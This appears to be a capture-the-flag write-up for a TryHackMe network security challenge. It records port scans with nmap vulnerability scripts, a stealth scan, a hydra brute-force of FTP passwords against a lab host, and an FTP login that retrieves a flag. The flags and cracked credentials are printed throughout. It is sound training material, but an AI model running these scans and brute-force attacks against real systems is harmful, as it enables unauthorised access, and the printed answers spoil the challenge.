3.7 KiB
3.7 KiB
Net Sec Challenge
Challenge Questions
I'll do a tools/enumeration/RustScan/target/release/rustscan -a 10.10.185.143 -u 5000 -- -sC -sV --vv --script vuln which delivers nearly all the answers to the following questions.
What is the highest port number being open less than 10,000?
8080
There is an open port outside the common 1000 ports; it is above 10,000. What is it?
10021
How many TCP ports are open?
These scanned protocols on the ports are all based on TCP.
6
What is the flag hidden in the HTTP server header?
80/tcp open http syn-ack lighttpd
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-server-header: lighttpd THM{web_server_25352}
What is the flag hidden in the SSH server header?
SF-Port22-TCP:V=7.92%I=7%D=10/16%Time=616A0C7A%P=x86_64-pc-linux-gnu%r(NUL
SF:L,29,"SSH-2\.0-OpenSSH_8\.2p1\x20THM{946219583339}\r\n");
THM{946219583339}
We have an FTP server listening on a nonstandard port. What is the version of the FTP server?
10021/tcp open ftp syn-ack vsftpd 3.0.3
vsftp 3.0.3
We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?
Some bruteforcing via hydra
[whackx@manbox ~]$ hydra -L users -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ftp://10.10.185.143:10021
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-16 01:35:05
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688796 login tries (l:2/p:14344398), ~1793050 tries per task
[DATA] attacking ftp://10.10.185.143:10021/
[10021][ftp] host: 10.10.185.143 login: eddie password: jordan
[10021][ftp] host: 10.10.185.143 login: quinn password: andrea
1 of 1 target successfully completed, 2 valid passwords found
[WARNING] Writing restore file because 8 final worker threads did not complete until end.
[ERROR] 8 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-16 01:35:36
Log in as quinn, download the flag via get ftp_flag.txt.
[whackx@manbox ~]$ ftp 10.10.185.143 10021
Connected to 10.10.185.143.
220 (vsFTPd 3.0.3)
Name (10.10.185.143:whackx): quinn
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 1002 1002 4096 Sep 20 08:36 .
drwxr-xr-x 2 1002 1002 4096 Sep 20 08:36 ..
-rw-r--r-- 1 1002 1002 220 Sep 14 07:43 .bash_logout
-rw-r--r-- 1 1002 1002 3771 Sep 14 07:43 .bashrc
-rw-r--r-- 1 1002 1002 807 Sep 14 07:43 .profile
-rw------- 1 1002 1002 723 Sep 20 08:27 .viminfo
-rw-rw-r-- 1 1002 1002 18 Sep 20 08:27 ftp_flag.txt
226 Directory send OK.
Browsing to http://10.10.185.143:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?
At first, I tried to be stealthy with something like the following.
[whackx@manbox ~]$ sudo nmap -T1 -sN -ff 10.10.185.143 -vv
That did not not work. So, I spun up an attack box and iterated through every flag possible. At some point the flag came up on the website.